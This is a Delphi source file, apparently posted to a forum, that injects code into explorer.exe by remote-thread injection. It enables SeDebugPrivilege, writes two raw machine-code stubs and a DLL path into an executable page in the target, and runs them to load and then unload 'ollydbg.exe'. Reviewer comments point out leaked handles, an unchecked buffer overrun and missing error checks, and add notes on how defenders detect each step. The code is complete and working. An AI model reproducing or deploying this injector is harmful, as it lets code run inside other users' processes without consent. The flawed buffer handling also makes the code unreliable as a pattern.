program Project1;
uses
sysutils,windows,tlhelp32;
{$R *.res}
var
// data1 / data2 are raw byte sequences (machine code) that this program never
// interprets itself: MakeData1 / MakeData2 copy them verbatim to offset 0 of a
// locally allocated page, and the main block writes that page into the target
// process and starts a remote thread at its address.
// The slot offsets that MakeData1 fills ($30, $130, $134, $138) show up as
// little-endian 32-bit operands inside these bytes ($30 $01 $00 $00 in data1,
// $34 $01 .. and $38 $01 .. in data2), so the stubs presumably dereference
// those slots relative to their own page — confirm by disassembly.
// Defender's view: these exact bytes, together with the plain-text path and
// kernel32 export addresses that MakeData1 places after them, are a usable
// memory-scan signature for the staged page inside the target process.
data1:array[0..25] of byte = (
$E8, $00, $00, $00,
$00, $5D, $83, $ED,
$05, $8D, $45, $30,
$50, $FF, $95, $30,
$01, $00, $00, $05,
$00, $10, $00, $00,
$FF, $E0
);
// Second stub, run by the main block after data1's thread has finished.
data2:array[0..35] of byte = (
$E8, $00, $00, $00,
$00, $5D, $83, $ED,
$05, $8D, $45, $30,
$50, $FF, $95, $34,
$01, $00, $00, $50,
$50, $FF, $95, $38,
$01, $00, $00, $FF,
$95, $38, $01, $00,
$00, $C2, $04, $00
);
// Enables (bEnable = True) or disables (bEnable = False) SeDebugPrivilege on
// the primary token of process `pid`.
// Parameters:
//   pid     - process whose token is adjusted. The main block passes its own
//             PID, so this enables the privilege for this process before it
//             opens explorer.exe.
//   bEnable - True sets SE_PRIVILEGE_ENABLED; False leaves Attributes = 0,
//             which AdjustTokenPrivileges treats as "disable".
// No result value and no error reporting: every failing call just falls
// through to the end of the procedure.
// NOTE(review): hToken is closed only on the branch where
// AdjustTokenPrivileges returns TRUE; when it fails the token handle leaks.
// NOTE(review): AdjustTokenPrivileges returning TRUE does not prove the
// privilege was granted (ERROR_NOT_ALL_ASSIGNED is reported via GetLastError);
// nothing here checks that.
// NOTE(review): PROCESS_ALL_ACCESS is more than OpenProcessToken needs
// (PROCESS_QUERY_INFORMATION suffices) — least-privilege would narrow this.
// Defender's view: a SeDebugPrivilege enable immediately followed by
// OpenProcess on a shell/system process is a common injection precursor and
// is visible in token/privilege-use auditing.
procedure AdjustPrivilege(pid:integer; bEnable:boolean);
var
hProcess:THANDLE;
hToken:THANDLE;
tkp,PrevTokenPriv: TTokenPrivileges;
ReturnLength: DWORD;
begin
// One privilege entry; Attributes = 0 means "disable" unless set below.
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := 0;
if (bEnable=true) then
begin
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
end;
// Resolve the LUID for SeDebugPrivilege on the local system (nil = local).
if (LookupPrivilegeValue(nil, 'SeDebugPrivilege', tkp.Privileges[0].Luid)=true) then
begin
hProcess := OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
// OpenProcess returns 0 (NULL) on failure.
if (hProcess>0) then
begin
if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken)=true ) then
begin
// PrevTokenPriv / ReturnLength receive the previous state; they are not used.
if (AdjustTokenPrivileges(hToken, FALSE, tkp, SizeOf(TTOKENPRIVILEGES), PrevTokenPriv, ReturnLength)=true) then
begin
CloseHandle(hToken);
end;
end;
CloseHandle(hProcess);
end;
end;
end;
// Returns the PID of the first process in a Toolhelp32 snapshot whose image
// name compares equal, case-insensitively, to 'EXPLORER.EXE'; returns 0 when
// no such process is found.
// NOTE(review): p32.dwSize is never initialised. The Toolhelp API requires it
// to be set before Process32First, so this depends on whatever the local
// record happens to contain — confirm against the compiler's initialisation
// rules for local records.
// NOTE(review): on the "found" path the function exits before
// CloseHandle(hC), so the snapshot handle leaks; it is only released when
// nothing matched.
// Defender's view: Toolhelp enumeration looking specifically for explorer.exe
// is the target-selection step of the injection that follows in the main block.
function FindExplorer():DWORD;
var
hC:THANDLE;
Next:boolean;
p32:PROCESSENTRY32;
begin
hC := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
Next := Process32First(hC, p32);
while (Next) do
begin
if (StrIComp(p32.szExeFile, 'EXPLORER.EXE') = 0) then
begin
result := p32.th32ProcessID;
// Early exit: hC is not closed here (see note above).
exit;
end;
Next := Process32Next(hC, p32);
end;
CloseHandle(hC);
result:= 0;
end;
// Fills the first payload page at Address (a local page of $1000 bytes
// allocated by the main block). Layout written here, all offsets from Address:
//   $000 : the data1 stub bytes (copied last, after the slots below)
//   $030 : NUL-terminated path "<current directory>\ollydbg.exe"
//   $130 : 32-bit address of kernel32!LoadLibraryA
//   $134 : 32-bit address of kernel32!GetModuleHandleA
//   $138 : 32-bit address of kernel32!FreeLibrary
// The three addresses are resolved in *this* process; using them in another
// process assumes kernel32 is mapped at the same base there — not verified.
// NOTE(review): szFileName holds MAX_PATH+1 chars and StrCat appends 12
// characters with no length check, so a long current directory overruns the
// local buffer. The string area in the page is $100 bytes ($30..$12F), so a
// path of 256+ characters would also overwrite the pointer slots at $130.
// Defender's view: the staged page carries a clear-text DLL path followed by
// three kernel32 export addresses, directly after a short code stub — a
// distinctive pattern for memory scanning of the target process.
procedure MakeData1(Address:pointer);
var
szFileName:array[0..MAX_PATH] of char;
begin
GetCurrentDirectory(MAX_PATH, szFileName);
StrCat(szFileName, '\ollydbg.exe');
// Path string at +$30, then the three function-pointer slots.
StrCopy(pchar(Address)+$30, szFileName);
PDWORD(pchar(Address)+$130)^ := DWORD(GetProcAddress(GetModuleHandle('kernel32'), 'LoadLibraryA'));
PDWORD(pchar(Address)+$134)^ := DWORD(GetProcAddress(GetModuleHandle('kernel32'), 'GetModuleHandleA'));
PDWORD(pchar(Address)+$138)^ := DWORD(GetProcAddress(GetModuleHandle('kernel32'), 'FreeLibrary'));
// Stub bytes go at offset 0; sizeof(data1) = 26 bytes, well below +$30.
CopyMemory(Address, @data1, sizeof(data1));
end;
// Fills the second payload page: copies the data2 stub (36 bytes) to offset 0
// of Address. Nothing else is written, so when the main block reuses the same
// local page the path string and pointer slots left by MakeData1 ($30,
// $130..$138) are still present and are re-sent to the target with the next
// WriteProcessMemory.
procedure MakeData2(Address:pointer);
begin
CopyMemory(Address, @data2, sizeof(data2));
end;
//OEP — program entry point.
// Sequence:
//   1. AdjustPrivilege on this process (enables SeDebugPrivilege).
//   2. FindExplorer -> PID; silent exit if 0.
//   3. OpenProcess(explorer) with CREATE_THREAD | VM_OPERATION | VM_WRITE;
//      silent exit on failure.
//   4. VirtualAlloc a local page and VirtualAllocEx a remote page, both
//      $1000 bytes, PAGE_EXECUTE_READWRITE.
//   5. MakeData1 into the local page -> WriteProcessMemory to the remote page
//      -> CreateRemoteThread starting at RemoteAddress -> wait for it.
//   6. MakeData2 into the same local page -> same write / thread / wait.
//   7. Release both pages.
// Defender's view: steps 3-6 are the textbook remote-thread injection chain
// (OpenProcess -> VirtualAllocEx RWX -> WriteProcessMemory -> CreateRemoteThread)
// aimed at explorer.exe. Each of those calls is a standard EDR/ETW detection
// point, and the private RWX page in explorer.exe is a memory-scan indicator.
// NOTE(review): after OpenProcess no return value is checked — a nil result
// from VirtualAlloc/VirtualAllocEx or a 0 handle from CreateRemoteThread is
// passed straight on to the next call.
// NOTE(review): `temp` receives the bytes-written count from
// WriteProcessMemory and then the new thread id from CreateRemoteThread
// (its last parameter); neither value is used.
// NOTE(review): hProcess is never closed, and the second hThread is neither
// closed nor released; both leak until process exit.
var
PID:DWORD;
hProcess:THANDLE;
hThread:THANDLE;
LocalAddress:PBYTE;
RemoteAddress:PBYTE;
temp:DWORD;
begin
AdjustPrivilege(GetCurrentProcessId(), TRUE);
PID := FindExplorer();
if (PID = 0) then
begin
exit;
end;
hProcess := OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE, FALSE, PID);
if (hProcess = 0) then
begin
exit;
end;
// Local staging page and remote destination page, same size and protection.
LocalAddress := PBYTE(VirtualAlloc(nil, $1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE));
RemoteAddress := PBYTE(VirtualAllocEx(hProcess, nil, $1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE));
// First stage: data1 stub + path + kernel32 pointers, run to completion.
MakeData1(LocalAddress);
WriteProcessMemory(hProcess, RemoteAddress, LocalAddress, $1000, temp);
hThread := CreateRemoteThread(hProcess, nil, 0, RemoteAddress, nil, 0, temp);
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
// Second stage: data2 stub over the same page (slots from stage 1 remain).
MakeData2(LocalAddress);
WriteProcessMemory(hProcess, RemoteAddress, LocalAddress, $1000, temp);
hThread := CreateRemoteThread(hProcess, nil, 0, RemoteAddress, nil, 0, temp);
WaitForSingleObject(hThread, INFINITE);
VirtualFree(LocalAddress, 0, MEM_RELEASE);
VirtualFreeEx(hProcess, RemoteAddress, 0, MEM_RELEASE);
end.
不错,帮你把代码贴上来